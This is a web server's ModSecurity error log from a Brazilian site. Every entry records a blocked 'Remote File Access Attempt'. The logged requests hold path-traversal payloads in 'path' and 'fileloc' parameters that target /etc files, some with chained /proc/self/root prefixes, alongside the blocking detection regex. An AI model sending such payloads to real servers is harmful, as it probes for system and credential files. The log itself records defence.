[Fri Mar 20 05:31:05.829781 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.241.31:37840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FyfHIg5MgXLBnicPcAgAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:08.802853 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.111:56292] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FzF1pVZ5mVmJwsFMSFAAAAEY"]
[Fri Mar 20 05:31:09.118727 2026] [:error] [pid 15826:tid 140411666392832] [client 57.141.18.98:56316] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FzeoXxyEfFpUF8f9kKwAAAUk"]
[Fri Mar 20 05:31:09.903838 2026] [:error] [pid 7235:tid 140411548894976] [client 57.141.18.124:56340] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FzfqxLDW4GITHUkTFOgAAARc"]
[Fri Mar 20 05:31:10.459416 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.86:56332] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FzhCii7xarUs8iHZJegAAAgM"]
[Fri Mar 20 05:31:10.819240 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.106:56282] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FzhCii7xarUs8iHZJfAAAAgo"]
[Fri Mar 20 05:31:12.051215 2026] [:error] [pid 11642:tid 140411557287680] [client 57.141.18.112:56410] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F0Lninkcc-iUj5ApBGwAAA5Y"]
[Fri Mar 20 05:31:12.919091 2026] [:error] [pid 9818:tid 140411683178240] [client 57.141.18.54:56430] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F0F1pVZ5mVmJwsFMSGQAAAEc"]
[Fri Mar 20 05:31:14.571052 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.56:56444] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F0fqxLDW4GITHUkTFPgAAAQ4"]
[Fri Mar 20 05:31:14.572124 2026] [:error] [pid 11167:tid 140411557287680] [client 57.141.18.3:56448] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F0vHIg5MgXLBnicPcDAAAAdY"]
[Fri Mar 20 05:31:16.223303 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.47:56520] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F1PHIg5MgXLBnicPcDgAAAcE"]
[Fri Mar 20 05:31:16.440694 2026] [:error] [pid 21219:tid 140411624429312] [client 57.141.18.112:56440] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F1PXLqtnMIWvjpaJ8lgAAAo4"]
[Fri Mar 20 05:31:17.641271 2026] [:error] [pid 21219:tid 140411641214720] [client 57.141.18.104:56560] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F1fXLqtnMIWvjpaJ8mQAAAow"]
[Fri Mar 20 05:31:19.481418 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.241.31:37068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F1vHIg5MgXLBnicPcEAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:19.485444 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.14:56586] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F1ta6ubjKNq_cu4az4AAAA04"]
[Fri Mar 20 05:31:19.504241 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.104:56590] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F1wF0L0L-SsrnPo5KXQAAAsg"]
[Fri Mar 20 05:31:20.303118 2026] [:error] [pid 7235:tid 140411632822016] [client 57.141.18.115:56640] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F2PqxLDW4GITHUkTFQgAAAQ0"]
[Fri Mar 20 05:31:20.976124 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:35152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F2PqxLDW4GITHUkTFRAAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:21.183780 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.113:56666] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F2fXLqtnMIWvjpaJ8ogAAApU"]
[Fri Mar 20 05:31:21.447504 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.64:56674] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F2fqxLDW4GITHUkTFRgAAAQQ"]
[Fri Mar 20 05:31:22.092219 2026] [:error] [pid 10189:tid 140411733534464] [client 57.141.18.102:56690] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F2jJ3M9BSuKP7CAb1jQAAAIE"]
[Fri Mar 20 05:31:22.183045 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.9:56694] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F2l1pVZ5mVmJwsFMSIwAAAEA"]
[Fri Mar 20 05:31:24.021136 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.113:56684] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F2uoXxyEfFpUF8f9kOwAAAUM"]
[Fri Mar 20 05:31:24.034431 2026] [:error] [pid 31215:tid 140411658000128] [client 57.141.18.63:56720] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F2wF0L0L-SsrnPo5KZAAAAso"]
[Fri Mar 20 05:31:24.038566 2026] [:error] [pid 31215:tid 140411574073088] [client 57.141.18.31:56712] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F2gF0L0L-SsrnPo5KYAAAAtQ"]
[Fri Mar 20 05:31:24.386669 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.51:56752] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F3PHIg5MgXLBnicPcEgAAAc0"]
[Fri Mar 20 05:31:25.374763 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.45:56748] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F3RCii7xarUs8iHZJhQAAAhY"]
